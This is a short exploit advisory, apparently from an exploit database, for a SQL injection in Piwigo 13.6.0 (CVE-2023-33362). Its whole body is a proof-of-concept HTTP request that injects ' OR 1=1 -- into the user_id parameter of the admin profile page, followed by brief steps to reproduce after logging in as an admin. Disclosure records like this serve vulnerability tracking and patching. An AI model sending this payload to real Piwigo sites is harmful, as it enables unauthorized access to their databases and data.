# Exploit Title: Piwigo 13.6.0 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage:  https://github.com/Piwigo/Piwigo
# Software Link: https://github.com/Piwigo/Piwigo
# Version: 13.6.0 
# Tested on: Windows
# CVE : CVE-2023-33362


Proof Of Concept:
GET /admin.php?page=profile&user_id=' OR 1=1 --  HTTP/1.1
Host: piwigo

Steps to Reproduce
Login as an admin user.
Send the request.
Observe the result